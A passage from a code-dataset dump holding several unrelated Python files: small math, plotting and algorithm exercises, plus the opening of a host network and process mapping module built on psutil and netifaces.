3))\n################################################\n","repo_name":"chiachii/Learn.NSE-Algorithm","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":1920,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"73"} +{"seq_id":"36939980314","text":"#!/usr/bin/env python3\nfrom mpl_toolkits.mplot3d import Axes3D\nimport matplotlib.pyplot as plt\nimport numpy as np\n\nlib = np.load(\"pca.npz\")\ndata = lib[\"data\"]\nlabels = lib[\"labels\"]\n\ndata_means = np.mean(data, axis=0)\nnorm_data = data - data_means\n_, _, Vh = np.linalg.svd(norm_data)\npca_data = np.matmul(norm_data, Vh[:3].T)\n\n\n# Creating our Axes3D object using the \"projection=‘3d’ keyword\"\n# Like outlined at:\n# https://matplotlib.org/2.0.2/mpl_toolkits/mplot3d/tutorial.html\nfigure = plt.figure()\ngraph = figure.add_subplot(111, projection='3d')\n\n# The data we want to represent is the 3 dimensional data present in pca_data\n# So we're putting each of the columns of our pca_data array into variables\nU1 = pca_data[:, 0]\nU2 = pca_data[:, 1]\nU3 = pca_data[:, 2]\n\n# Scatters our data in our graph thanks to our U1, U2 an U3 coordinates\n# The argument c stands for color and we can pass it the whole labels array\n# directly thanks to the cmap argument\ngraph.scatter(U1, U2, U3, cmap=\"plasma\", c=labels, s=20)\n\n# Set labels and titles\ngraph.set_xlabel(\"U1\")\ngraph.set_ylabel(\"U2\")\ngraph.set_zlabel(\"U3\")\ngraph.set_title(\"PCA of Iris Dataset\")\n\n# Prints our graph\nplt.show()\n","repo_name":"OctaveC/holbertonschool-machine_learning","sub_path":"math/plotting/101-pca.py","file_name":"101-pca.py","file_ext":"py","file_size_in_byte":1178,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"} +{"seq_id":"14770522848","text":"import math\nimport numpy as np\n\ndef mc_loren(num, iter):\n res = 0\n for i in range(1, iter):\n pre=(math.factorial(2 * i) * (num ** i)) / ((1 - 2 * i) * (math.factorial(i) ** 2) * (4 ** i))\n if i % 2 == 0:\n res += pre\n else:\n res -= pre\n return res\n\n\nclass MyNumber(object):\n def __init__(self, zeta):\n \"\"\"Конструктор принимает zeta, но обьект соответствует числу x=1+zeta.\"\"\"\n self.zeta=zeta\n def __str__(self):\n \"\"\"На экран выводится значение x, кото��ое может быть менее точно,\n чем храниемое значение.\"\"\"\n return \"{}\".format(self.to_float())\n def from_float(x):\n \"\"\"Создает число со значением, равным x.\"\"\"\n return MyNumber(x-1)\n def to_float(self):\n \"\"\"Преобразует число в формат с плавающей запятой\"\"\"\n return self.zeta+1\n def __mul__(self, other):\n \"\"\"Перезагрузка операции умножения.\"\"\"\n return MyNumber(self.zeta+other.zeta+self.zeta*other.zeta)\n def sqrt(self):\n if (self.zeta < 1):\n beta = mc_loren(self.zeta, 30)\n return MyNumber(beta)\n else:\n beta = math.sqrt(self.zeta+1)\n return MyNumber.from_float(beta)\n\ndef f_sqrt_sqr(x=MyNumber.from_float(np.pi), n=52):\n for k in range(n): x = x.sqrt()\n for k in range(n): x = x*x\n return x\n\nfloat_num = 2.44567\nprint(\"Число с плавающей запятой:\", float_num)\nnum = MyNumber.from_float(float_num)\nprint(\"Наше представление числа: \", num)\nprint(\"Квадрат в арифметике с плавающей запятой:\", float_num*float_num)\nprint(\"Квадрат в нашем представлении: \", num*num)\nn = 52\nprint(\"Число до преобразований: \", num)\nnew_num = f_sqrt_sqr(num)\nprint(\"Число после преобразований: \", new_num)\ndelta = num.to_float() - new_num.to_float()\neps = np.abs(delta) / num.to_float()\nprint(\"Разница: \", eps)","repo_name":"Karadarya/numerical_simulation_labs","sub_path":"lab1.py","file_name":"lab1.py","file_ext":"py","file_size_in_byte":2228,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"} +{"seq_id":"14449014206","text":"import math\r\nclass Complex(object):\r\n def __init__(self, real, imaginary):\r\n self.real=real\r\n self.imaginary=imaginary \r\n \r\n def __add__(self, no):\r\n real=self.real+no.real\r\n imaginary=self.imaginary+no.imaginary\r\n return(Complex(real,imaginary))\r\n\r\n \r\n def __sub__(self, no):\r\n real=self.real-no.real\r\n imaginary=self.imaginary-no.imaginary\r\n \r\n return(Complex(real,imaginary))\r\n \r\n def __mul__(self, no):\r\n real=self.real*no.real-self.imaginary*no.imaginary\r\n imaginary=self.real*no.imaginary+self.imaginary*no.real\r\n return(Complex(real,imaginary))\r\n \r\n\r\n def __truediv__(self, no):\r\n x=float(no.real**2+no.imaginary**2)\r\n y=self*Complex(no.real,-no.imaginary)\r\n real=y.real/x\r\n imaginary=y.imaginary/x\r\n return(Complex(real,imaginary))\r\n \r\n\r\n def mod(self):\r\n real=math.sqrt(self.real**2+self.imaginary**2)\r\n return(Complex(real,0))\r\n \r\n\r\n def __str__(self):\r\n if self.imaginary == 0:\r\n result = \"%.2f+0.00i\" % (self.real)\r\n elif self.real == 0:\r\n if self.imaginary >= 0:\r\n result = \"0.00+%.2fi\" % (self.imaginary)\r\n else:\r\n result = \"0.00-%.2fi\" % (abs(self.imaginary))\r\n elif self.imaginary > 0:\r\n result = \"%.2f+%.2fi\" % (self.real, self.imaginary)\r\n else:\r\n result = \"%.2f-%.2fi\" % (self.real, abs(self.imaginary))\r\n return result\r\n\r\n\r\nif __name__ == '__main__':\r\n c = map(float, input().split())\r\n d = map(float, input().split())\r\n x = Complex(*c)\r\n y = Complex(*d)\r\n print(*map(str, [x+y, x-y, x*y, x/y, x.mod(), y.mod()]), sep='\\n')\r\n","repo_name":"manishbisht/Competitive-Programming","sub_path":"Hackerrank/Practice/Python/11.Classes/75.Classes_ Dealing with Complex Numbers.py","file_name":"75.Classes_ Dealing with Complex Numbers.py","file_ext":"py","file_size_in_byte":1774,"program_lang":"python","lang":"en","doc_type":"code","stars":1369,"dataset":"github-code","pt":"73"} +{"seq_id":"19490310774","text":"# problem link : https://www.codetree.ai/missions/2/problems/best-place-of-33?&utm_source=clipboard&utm_medium=text\n\nn = int(input())\n\ngrid = [list(map(int, input().split())) for _ in range(n)]\n\ndef get_sum_of_gold(row_s, col_s, row_e, col_e):\n num_of_gold = 0\n\n for row in range(row_s, row_e + 1):\n for col in range(col_s, col_e + 1):\n num_of_gold += grid[row][col]\n\n return num_of_gold\n\nmax_gold = 0\n\nfor row in range(n):\n for col in range(n):\n if row + 2 >= n or col + 2 >= n:\n continue\n \n num_of_gold = get_sum_of_gold(row, col, row + 2, col + 2)\n\n max_gold = max(max_gold, num_of_gold)\n\nprint(max_gold)","repo_name":"jaesukpark77/Coding_Test_Study","sub_path":"codetree/INTERMEDIATE LOW/01. Simulation/격자 안에서 완전탐색/최고의 33위치.py","file_name":"최���의 33위치.py","file_ext":"py","file_size_in_byte":676,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"} +{"seq_id":"35892131316","text":"from PIL import Image\nfrom numpy import *\nfrom pylab import *\nimport os, sift, KNN\n\ndef ReadGestureFeaturesLabels(Path):\n FeatList=[os.path.join(Path,f) for f in os.listdir(Path) if f.endswith('.dsift')];\n Features=[];\n for FeatFile in FeatList:\n L,D=sift.ReadFeaturesFromFile(FeatFile);\n Features.append(D.flatten());\n Features=array(Features);\n\n Labels=[FeatFile.split('/')[-1][0] for FeatFile in FeatList];\n return Features,array(Labels);\n\ndef PrintConfusion(Res,Labels,ClassNames):\n\tN=len(ClassNames);\n\tClassIndex=dict([(ClassNames[i],i) for i in range(N)]);\n\tConfuse=zeros((N,N));\n\tfor i in range(len(TestLabels)):\n\t\tConfuse[ClassIndex[Res[i]],ClassIndex[TestLabels[i]]]+=1;\n\n\tprint('Confusion Matrix For');\n\tprint(ClassNames);\n\tprint(Confuse);\n\nFeatures,Labels=ReadGestureFeaturesLabels('../ActiveTest/gesture/train');\nTestFeatures,TestLabels=ReadGestureFeaturesLabels('../ActiveTest/gesture/test/');\n\nClassNames=unique(Labels);\n\nK=1;\nKNNClassifier=KNN.KNNClassifier(Labels,Features);\nRes=array([KNNClassifier.Classify(TestFeatures[i],K) for i in range(len(TestLabels))]);\n\nAcc=sum(1.0*(Res==TestLabels))/len(TestLabels);\nprint('Accuracy:',Acc);\n\nPrintConfusion(Res,Labels,ClassNames);\n","repo_name":"paul2705/pythonCV","sub_path":"ImgProc/ImgKNN.py","file_name":"ImgKNN.py","file_ext":"py","file_size_in_byte":1224,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"} +{"seq_id":"27958936487","text":"#\n# @lc app=leetcode.cn id=16 lang=python3\n#\n# [16] 最接近的三数之和\n#\n# https://leetcode-cn.com/problems/3sum-closest/description/\n#\n# algorithms\n# Medium (42.85%)\n# Likes: 365\n# Dislikes: 0\n# Total Accepted: 74.7K\n# Total Submissions: 173.7K\n# Testcase Example: '[-1,2,1,-4]\\n1'\n#\n# 给定一个包括 n 个整数的数组 nums 和 一个目标值 target。找出 nums 中的三个整数,使得它们的和与 target\n# 最接近。返回这三个数的和。假定每组输入只存在唯一答案。\n#\n# 例如,给定数组 nums = [-1,2,1,-4], 和 target = 1.\n#\n# 与 target 最接近的三个数的和为 2. (-1 + 2 + 1 = 2).\n#\n#\n#\n\n# @lc code=start\n\n\nclass Solution:\n def threeSumClosest(self, nums: List[int], target: int) -> int:\n if len(nums) < 3:\n return []\n nums.sort()\n i = 0\n head = 1\n tail = len(nums) - 1\n answer = 999999\n while 1:\n number = nums[i] + nums[head] + nums[tail]-target\n if number < 0:\n head += 1\n while nums[head] == nums[head - 1]and head < tail:\n head += 1\n elif number > 0:\n tail -= 1\n while nums[tail] == nums[tail + 1]and head < tail:\n tail -= 1\n else:\n return target\n answer = number+target if abs(\n answer-target) > abs(number) else answer\n if head >= tail:\n tem = i\n for j in range(i, len(nums)-2):\n if nums[i] != nums[j]:\n i = j\n head = i+1\n tail = len(nums) - 1\n break\n if tem == i:\n break\n return answer\n# @lc code=end\n","repo_name":"linitachi/LeetCode_Practice","sub_path":"medium/16.最接近的三数之和.py","file_name":"16.最接近的三数之和.py","file_ext":"py","file_size_in_byte":1829,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"} +{"seq_id":"43087469746","text":"import copy\nfrom ipaddress import ip_network, IPv4Address\nimport json\nimport logging\nimport re\nimport socket\nimport netifaces\nimport timeit\nimport traceback\nimport psutil\n\n__author__ = 'mffrench'\n\nLOGGER = logging.getLogger(__name__)\n\n\nclass MapSocket(object):\n\n cached_hostbyaddr = {}\n\n def __init__(self, source_ip=None, source_port=None, source_endpoint_id=None,\n destination_ip=None, destination_port=None, destination_osi_id=None,\n destination_subnet_id=None, destination_routing_area_id=None, destination_location_id=None,\n destination_endpoint_id=None, destination_node_id=None, destination_container_id=None,\n family=None, rtype=None, status=None, link_id=None, transport_id=None, file_descriptors=None):\n self.source_ip = source_ip\n self.source_port = source_port\n self.source_endpoint_id = source_endpoint_id\n\n self.destination_ip = destination_ip\n self.destination_port = destination_port\n self.destination_osi_id = destination_osi_id\n self.destination_subnet_id = destination_subnet_id\n self.destination_routing_area_id = destination_routing_area_id\n self.destination_location_id = destination_location_id\n self.destination_endpoint_id = destination_endpoint_id\n self.destination_node_id = destination_node_id\n self.destination_container_id = destination_container_id\n\n self.file_descriptors = file_descriptors if file_descriptors is not None else []\n self.status = status\n self.family = family\n self.type = rtype\n self.link_id = link_id\n self.transport_id = transport_id\n\n def __str__(self):\n return json.dumps(self.to_json())\n\n __repr__ = __str__\n\n def __eq__(self, other):\n if self.family != other.family or self.type != other.type or self.source_ip != other.source_ip\\\n or self.source_port != other.source_port or self.destination_ip != other.destination_ip\\\n or self.destination_port != other.destination_port:\n return False\n else:\n return True\n\n @staticmethod\n def ipv6_2_ipv4(ipv6):\n ipv4 = ipv6\n if ipv6.startswith(\"::127\"):\n ipv4 = ipv6.split(\"::\")[1]\n elif ipv6.lower().startswith(\"::ffff:\"):\n ipv4 = ipv6.lower().split(\"::ffff:\")[1]\n elif ipv6 == \"::1\":\n ipv4 = \"127.0.0.1\"\n elif ipv6 == \"::\":\n ipv4 = \"0.0.0.0\"\n elif re.match(r\"::*\\.*\\.*\\.*\", ipv6.lower()):\n ipv4 = ipv6.split(\"::\")[1]\n return ipv4\n\n def transform_system_ipv6_to_ipv4(self):\n source_ip = self.source_ip\n destination_ip = self.destination_ip\n if self.family == \"AF_INET6\":\n if self.destination_ip is not None:\n destination_ip = MapSocket.ipv6_2_ipv4(self.destination_ip)\n if self.source_ip is not None:\n source_ip = MapSocket.ipv6_2_ipv4(self.source_ip)\n return source_ip, destination_ip\n\n def to_json(self):\n json_obj = {\n 'status': self.status,\n 'family': self.family,\n 'type': self.type,\n 'file_descriptors': self.file_descriptors,\n 'link_id': self.link_id,\n 'transport_id': self.transport_id,\n 'source_ip': self.source_ip,\n 'source_port': self.source_port,\n 'source_endpoint_id': self.source_endpoint_id,\n 'destination_ip': self.destination_ip,\n 'destination_port': self.destination_port,\n 'destination_osi_id': self.destination_osi_id,\n 'destination_subnet_id': self.destination_subnet_id,\n 'destination_routing_area_id': self.destination_routing_area_id,\n 'destination_location_id': self.destination_location_id,\n 'destination_endpoint_id': self.destination_endpoint_id,\n 'destination_node_id': self.destination_node_id,\n 'destination_container_id': self.destination_container_id\n }\n return json_obj\n\n @staticmethod\n def from_json(json_obj):\n return MapSocket(\n status=json_obj['status'],\n family=json_obj['family'],\n rtype=json_obj['type'],\n file_descriptors=json_obj['file_descriptors'],\n link_id=json_obj['link_id'],\n transport_id=json_obj['transport_id'],\n source_ip=json_obj['source_ip'],\n source_port=json_obj['source_port'],\n source_endpoint_id=json_obj['source_endpoint_id'],\n destination_ip=json_obj['destination_ip'],\n destination_port=json_obj['destination_port'],\n destination_osi_id=json_obj['destination_osi_id'],\n destination_subnet_id=json_obj['destination_subnet_id'],\n destination_routing_area_id=json_obj['destination_routing_area_id'],\n destination_location_id=json_obj['destination_location_id'],\n destination_endpoint_id=json_obj['destination_endpoint_id'],\n destination_node_id=json_obj['destination_node_id'],\n destination_container_id=json_obj['destination_container_id']\n )\n\n @staticmethod\n def type_2_string(mstype):\n if mstype == socket.SOCK_STREAM:\n return 'SOCK_STREAM'\n elif mstype == socket.SOCK_DGRAM:\n return 'SOCK_DGRAM'\n else:\n return mstype\n\n @staticmethod\n def family_2_string(family):\n if family == socket.AddressFamily.AF_INET:\n return 'AF_INET'\n elif family == socket.AddressFamily.AF_INET6:\n return 'AF_INET6'\n elif family == socket.AddressFamily.AF_UNIX:\n return 'AF_UNIX'\n else:\n return family\n\n @staticmethod\n def get_cached_hostbyaddr(host):\n ret = None\n in_cache = False\n if host in MapSocket.cached_hostbyaddr.keys():\n # update hostbyaddr cache every day\n if timeit.default_timer() - MapSocket.cached_hostbyaddr[host]['time'] > 3600*24:\n MapSocket.cached_hostbyaddr.pop(host)\n else:\n in_cache = True\n\n if in_cache:\n ret = MapSocket.cached_hostbyaddr[host]['hostbyaddr']\n else:\n try:\n ret = socket.gethostbyaddr(host)[0]\n MapSocket.cached_hostbyaddr[host] = {\n 'hostbyaddr': ret,\n 'time': timeit.default_timer()\n }\n except socket.herror as e:\n MapSocket.cached_hostbyaddr[host] = {\n 'hostbyaddr': None,\n 'time': timeit.default_timer()\n }\n LOGGER.debug(str(host))\n LOGGER.debug(e.__str__())\n LOGGER.debug(traceback.format_exc())\n except OSError as e:\n MapSocket.cached_hostbyaddr[host] = {\n 'hostbyaddr': None,\n 'time': timeit.default_timer()\n }\n LOGGER.debug(str(host))\n LOGGER.debug(e.__str__())\n LOGGER.debug(traceback.format_exc())\n return ret\n\n\n\n\nclass Process(object):\n def __init__(self, mapping_id=None, is_node=True, name=None, pid=None, create_time=None, exe=None, cwd=None,\n cmdline=None, username=None, cpu_affinity=None, terminal=None, map_sockets=None,\n last_map_sockets=None, new_map_sockets=None, dead_map_sockets=None,\n uids=None, gids=None):\n self.mapping_id = mapping_id\n self.is_node = is_node\n self.pid = pid\n self.name = name\n self.create_time = create_time\n self.exe = exe\n self.cwd = cwd\n self.cmdline = cmdline\n self.username = username\n self.cpu_affinity = cpu_affinity\n self.terminal = terminal\n self.last_map_sockets = last_map_sockets if last_map_sockets is not None else []\n self.map_sockets = map_sockets if map_sockets is not None else []\n self.new_map_sockets = new_map_sockets if new_map_sockets is not None else []\n self.dead_map_sockets = dead_map_sockets if dead_map_sockets is not None else []\n self.uids = uids\n self.gids = gids\n\n def __eq__(self, other):\n if self.pid != other.pid or self.name != other.name or self.create_time != other.create_time:\n return False\n else:\n return True\n\n def __str__(self):\n return json.dumps(self.proc_2_json())\n\n __repr__ = __str__\n\n def proc_2_json(self):\n map_sockets_json = []\n if self.map_sockets is not None:\n for map_socket in self.map_sockets:\n map_sockets_json.append(map_socket.to_json())\n new_map_sockets_json = []\n if self.new_map_sockets is not None:\n for map_socket in self.new_map_sockets:\n new_map_sockets_json.append(map_socket.to_json())\n dead_map_sockets_json = []\n if self.dead_map_sockets is not None:\n for map_socket in self.dead_map_sockets:\n dead_map_sockets_json.append(map_socket.to_json())\n json_obj = {\n 'pid': self.pid,\n 'name': self.name,\n 'create_time': self.create_time,\n 'exe': self.exe,\n 'cwd': self.cwd,\n 'cmdline': self.cmdline,\n 'username': self.username,\n 'cpu_affinity': self.cpu_affinity,\n 'terminal': self.terminal,\n 'sockets': map_sockets_json,\n 'new_sockets': new_map_sockets_json,\n 'dead_sockets': dead_map_sockets_json,\n 'uids': self.uids,\n 'gids': self.gids,\n 'mapping_id': self.mapping_id,\n 'is_node': self.is_node\n }\n return json_obj\n\n @staticmethod\n def json_2_proc(json_obj):\n map_sockets = []\n map_sockets_json = json_obj['sockets'] if 'sockets' in json_obj else []\n for connection_json in map_sockets_json:\n map_sockets.append(MapSocket.from_json(connection_json))\n new_map_sockets = []\n new_map_sockets_json = json_obj['new_sockets'] if 'new_sockets' in json_obj else []\n for connection_json in new_map_sockets_json:\n new_map_sockets.append(MapSocket.from_json(connection_json))\n dead_map_sockets = []\n dead_map_sockets_json = json_obj['dead_sockets'] if 'dead_sockets' in json_obj else []\n for connection_json in dead_map_sockets_json:\n dead_map_sockets.append(MapSocket.from_json(connection_json))\n return Process(pid=json_obj['pid'], name=json_obj['name'], create_time=json_obj['create_time'],\n exe=json_obj['exe'], cwd=json_obj['cwd'], cmdline=json_obj['cmdline'],\n username=json_obj['username'], cpu_affinity=json_obj['cpu_affinity'],\n terminal=json_obj['terminal'], map_sockets=map_sockets, new_map_sockets=new_map_sockets,\n dead_map_sockets=dead_map_sockets, uids=json_obj['uids'], gids=json_obj['gids'],\n mapping_id=json_obj['mapping_id'], is_node=json_obj['is_node'])\n\n\nclass NicDuplex(object):\n NIC_DUPLEX_FULL = 2\n NIC_DUPLEX_HALF = 1\n NIC_DUPLEX_UNKNOWN = 0\n\n\nclass NetworkInterfaceCard(object):\n def __init__(self, nic_id=None, name=None, mac_address=None, duplex=None, speed=None, mtu=None,\n ipv4_id=None, ipv4_address=None, ipv4_subnet_addr=None, ipv4_subnet_mask=None, ipv4_broadcast=None,\n ipv4_fqdn=None, ipv6_address=None, ipv6_mask=None, is_default=False, in_local_routingarea=False):\n self.nic_id = nic_id\n self.name = name\n self.mac_address = mac_address\n self.duplex = duplex\n self.speed = speed\n self.mtu = mtu\n self.ipv4_id = ipv4_id\n self.ipv4_address = ipv4_address\n self.ipv4_subnet_addr = ipv4_subnet_addr\n self.ipv4_subnet_mask = ipv4_subnet_mask\n self.ipv4_broadcast = ipv4_broadcast\n self.ipv4_fqdn = ipv4_fqdn\n self.ipv6_address = ipv6_address\n self.ipv6_mask = ipv6_mask\n self.is_default = is_default\n self.in_local_routingarea = in_local_routingarea\n\n def __eq__(self, other):\n if self.nic_id != other.nic_id or self.name != other.name or self.mac_address != other.mac_address\\\n or self.duplex != other.duplex or self.speed != other.speed or self.mtu != other.mtu\\\n or self.ipv4_id != other.ipv4_id or self.ipv4_address != other.ipv4_address\\\n or self.ipv4_subnet_mask != other.ipv4_subnet_mask \\\n or self.ipv4_fqdn != other.ipv4_fqdn or self.ipv4_broadcast != other.ipv4_broadcast:\n return False\n else:\n return True\n\n def __str__(self):\n return json.dumps(self.to_json())\n\n __repr__ = __str__\n\n def to_json(self):\n json_obj = {\n 'nic_id': self.nic_id,\n 'ipv4_id': self.ipv4_id,\n 'name': self.name,\n 'mac_address': self.mac_address,\n 'duplex': self.duplex,\n 'speed': self.speed,\n 'mtu': self.mtu,\n 'ipv4_address': self.ipv4_address,\n 'ipv4_subnet_addr': self.ipv4_subnet_addr,\n 'ipv4_subnet_mask': self.ipv4_subnet_mask,\n 'ipv4_broadcast': self.ipv4_broadcast,\n 'ipv4_fqdn': self.ipv4_fqdn,\n 'ipv6_address': self.ipv6_address,\n 'ipv6_mask': self.ipv6_mask,\n 'is_default': self.is_default,\n 'in_local_routingarea': self.in_local_routingarea\n }\n return json_obj\n\n @staticmethod\n def ip_is_in_subnet(ip_address, subnet_ip, subnet_mask):\n ret = False\n if ip_address and subnet_ip and subnet_mask:\n ret = IPv4Address(ip_address) in ip_network(subnet_ip + '/' + subnet_mask)\n return ret\n\n @staticmethod\n def from_json(json_obj):\n return NetworkInterfaceCard(nic_id=json_obj['nic_id'], name=json_obj['name'],\n mac_address=json_obj['mac_address'], duplex=json_obj['duplex'],\n speed=json_obj['speed'], mtu=json_obj['mtu'],\n ipv4_address=json_obj['ipv4_address'],\n ipv4_subnet_addr=json_obj['ipv4_subnet_addr'],\n ipv4_subnet_mask=json_obj['ipv4_subnet_mask'],\n ipv4_broadcast=json_obj['ipv4_broadcast'], ipv4_fqdn=json_obj['ipv4_fqdn'],\n ipv4_id=json_obj['ipv4_id'], ipv6_address=json_obj['ipv6_address'],\n ipv6_mask=json_obj['ipv6_mask'],\n in_local_routingarea=json_obj['in_local_routingarea'])\n\n @staticmethod\n def duplex_2_string(duplex):\n if duplex == NicDuplex.NIC_DUPLEX_UNKNOWN:\n return 'UNKNOWN'\n elif duplex == NicDuplex.NIC_DUPLEX_FULL:\n return 'FULL'\n elif duplex == NicDuplex.NIC_DUPLEX_HALF:\n return 'HALF'\n else:\n return 'UNKNOWN'\n\n\nclass OperatingSystem(object):\n def __init__(self, container_id=None, osi_id=None, ost_id=None, environment_id=None, team_id=None,\n location_id=None, routing_area_ids=None, subnet_ids=None,\n hostname=None, last_nics=None, nics=None, last_processs=None, processs=None,\n new_processs=None, dead_processs=None,\n duplex_links_endpoint=None, wip_delete_duplex_links_endpoints=None, config=None):\n LOGGER.debug(\"OperatingSystem.__init__\")\n\n self.container_id = container_id\n\n self.osi_id = osi_id\n self.ost_id = ost_id\n self.location_id = location_id\n self.routing_area_ids = routing_area_ids if routing_area_ids is not None else []\n self.subnet_ids = subnet_ids if subnet_ids is not None else []\n self.environment_id = environment_id\n self.team_id = team_id\n\n self.config = config\n self.hostname = hostname if hostname is not None else socket.gethostname()\n self.last_nics = last_nics if last_nics is not None else []\n self.nics = nics if nics is not None else []\n self.last_processs = last_processs if last_processs is not None else []\n self.processs = processs if processs is not None else []\n self.new_processs = new_processs if new_processs is not None else []\n self.dead_processs = dead_processs if dead_processs is not None else []\n\n self.duplex_links_endpoints = duplex_links_endpoint if duplex_links_endpoint is not None else []\n self.wip_delete_duplex_links_endpoints = wip_delete_duplex_links_endpoints if wip_delete_duplex_links_endpoints is not None else []\n\n def __eq__(self, other):\n if self.osi_id != other.osi_id or self.hostname != other.hostname:\n return False\n else:\n return True\n\n def __str__(self):\n return json.dumps(self.operating_system_2_json())\n\n __repr__ = __str__\n\n def is_local(self, ip, family):\n is_local = False\n\n if ip is not None and family == \"AF_INET\":\n for nic in self.nics:\n if nic.in_local_routingarea and NetworkInterfaceCard.ip_is_in_subnet(\n ip, nic.ipv4_subnet_addr, nic.ipv4_subnet_mask\n ):\n is_local = True\n break\n\n elif ip is not None and family == \"AF_INET6\":\n destination_ipv4 = MapSocket.ipv6_2_ipv4(ip)\n if destination_ipv4 != ip:\n for nic in self.nics:\n if nic.in_local_routingarea and NetworkInterfaceCard.ip_is_in_subnet(\n destination_ipv4, nic.ipv4_subnet_addr, nic.ipv4_subnet_mask\n ):\n is_local = True\n break\n else:\n # TODO: check is ipv6 in subnet ?\n for nic in self.nics:\n if nic.in_local_routingarea and nic.ipv6_address is not None and \\\n ip == nic.ipv6_address:\n is_local = True\n break\n\n elif family == \"AF_UNIX\":\n is_local = True\n\n LOGGER.debug(str(ip) + \" is local: \" + str(is_local))\n\n return is_local\n\n def is_local_destination(self, mapping_socket):\n LOGGER.debug(\"OperatingSystem.is_local_destination\")\n return self.is_local(mapping_socket.destination_ip, mapping_socket.family)\n\n def is_local_service(self, mapping_socket):\n LOGGER.debug(\"OperatingSystem.is_local_service\")\n return self.is_local(mapping_socket.source_ip, mapping_socket.family)\n\n def need_directories_refresh(self):\n LOGGER.debug(\"OperatingSystem.need_directories_refresh\")\n if self.last_nics != self.nics:\n return True\n else:\n return False\n\n def operating_system_2_json(self):\n LOGGER.debug(\"OperatingSystem.operating_system_2_json\")\n last_nics_json = []\n for nic in self.last_nics:\n last_nics_json.append(nic.to_json())\n nics_json = []\n for nic in self.nics:\n nics_json.append(nic.to_json())\n last_processs_json = []\n for process in self.last_processs:\n last_processs_json.append(process.proc_2_json())\n processs_json = []\n for process in self.processs:\n processs_json.append(process.proc_2_json())\n new_processs_json = []\n for process in self.new_processs:\n new_processs_json.append(process.proc_2_json())\n dead_processs_json = []\n for process in self.dead_processs:\n dead_processs_json.append(process.proc_2_json())\n json_obj = {\n 'hostname': self.hostname,\n 'last_nics': last_nics_json,\n 'nics': nics_json,\n 'last_processs': last_processs_json,\n 'processs': processs_json,\n 'new_processs': new_processs_json,\n 'dead_processs': dead_processs_json,\n 'container_id': self.container_id,\n 'osi_id': self.osi_id,\n 'ost_id': self.ost_id,\n 'location_id': self.location_id,\n 'routing_area_ids': self.routing_area_ids,\n 'subnet_ids': self.subnet_ids,\n 'environment_id': self.environment_id,\n 'team_id': self.team_id,\n 'duplex_links_endpoints': self.duplex_links_endpoints,\n 'wip_delete_duplex_links_endpoints': self.wip_delete_duplex_links_endpoints\n }\n return json_obj\n\n @staticmethod\n def json_2_operating_system(json_obj):\n LOGGER.debug(\"OperatingSystem.json_2_operating_system\")\n last_nics_json = json_obj['last_nics'] if 'last_nics' in json_obj else []\n last_nics = []\n for last_nic_json in last_nics_json:\n last_nics.append(NetworkInterfaceCard.from_json(last_nic_json))\n\n nics_json = json_obj['nics'] if 'nics' in json_obj else []\n nics = []\n for nic_json in nics_json:\n nics.append(NetworkInterfaceCard.from_json(nic_json))\n\n last_processs_json = json_obj['last_processs'] if 'last_processs' in json_obj else []\n last_processs = []\n for last_process in last_processs_json:\n last_processs.append(Process.json_2_proc(last_process))\n\n processs_json = json_obj['processs'] if 'processs' in json_obj else []\n processs = []\n for process in processs_json:\n processs.append(Process.json_2_proc(process))\n\n new_processs_json = json_obj['new_processs'] if 'new_processs' in json_obj else []\n new_processs = []\n for process in new_processs_json:\n new_processs.append(Process.json_2_proc(process))\n\n dead_processs_json = json_obj['dead_processs'] if 'dead_processs' in json_obj else []\n dead_processs = []\n for process in dead_processs_json:\n dead_processs.append(Process.json_2_proc(process))\n\n return OperatingSystem(\n container_id=json_obj['container_id'], osi_id=json_obj['osi_id'],\n ost_id=json_obj['ost_id'], location_id=json_obj['location_id'],\n environment_id=json_obj['environment_id'], team_id=json_obj['team_id'],\n routing_area_ids=json_obj['routing_area_ids'], subnet_ids=json_obj['subnet_ids'],\n hostname=json_obj['hostname'], last_nics=last_nics, nics=nics, last_processs=last_processs,\n processs=processs, new_processs=new_processs, dead_processs=dead_processs,\n duplex_links_endpoint=json_obj['duplex_links_endpoints'],\n wip_delete_duplex_links_endpoints=json_obj['wip_delete_duplex_links_endpoints']\n )\n\n def update(self):\n LOGGER.debug(\"OperatingSystem.update\")\n self.last_nics = copy.deepcopy(self.nics)\n self.last_processs = copy.deepcopy(self.processs)\n self.sniff()\n\n def sniff(self):\n LOGGER.debug(\"OperatingSystem.sniff\")\n self.nics = []\n self.processs = []\n self.new_processs = []\n self.dead_processs = []\n\n default_nic = netifaces.gateways()['default'][netifaces.AF_INET][1]\n\n for nic_name_stat, snicstats in psutil.net_if_stats().items():\n is_default = (nic_name_stat == default_nic)\n nic = NetworkInterfaceCard(name=nic_name_stat,\n duplex=NetworkInterfaceCard.duplex_2_string(snicstats.duplex),\n speed=snicstats.speed, mtu=snicstats.mtu, is_default=is_default)\n for nic_name_snic, snic_table in psutil.net_if_addrs().items():\n if nic_name_snic == nic_name_stat:\n for snic in snic_table:\n if snic.family == psutil.AF_LINK:\n nic.mac_address = snic.address\n elif snic.family == socket.AddressFamily.AF_INET:\n nic.ipv4_address = snic.address\n if snic.address is not None and snic.netmask is not None:\n ntw_addr = ip_network(str(snic.address) + '/' +\n str(snic.netmask), strict=False).network_address\n else:\n ntw_addr = None\n if ntw_addr is not None:\n nic.ipv4_subnet_addr = str(ntw_addr)\n else:\n nic.ipv4_subnet_addr = None\n nic.ipv4_subnet_mask = snic.netmask\n nic.ipv4_broadcast = snic.broadcast\n if self.config is not None and self.config.local_routing_area is not None and \\\n self.config.local_routing_area.subnets.__len__() != 0:\n for subnet in self.config.local_routing_area.subnets:\n if nic.ipv4_subnet_addr == subnet.subnet_ip:\n LOGGER.debug('OperatingSystem.sniff - NIC ' + str(nic.ipv4_address) +\n ' playing in local area only.')\n nic.in_local_routingarea = True\n break\n try:\n nic.ipv4_fqdn = socket.gethostbyaddr(snic.address)[0]\n if nic.ipv4_fqdn == 'localhost' or nic.ipv4_fqdn == socket.gethostname():\n nic.ipv4_fqdn = nic_name_stat + '.' + socket.gethostname()\n except 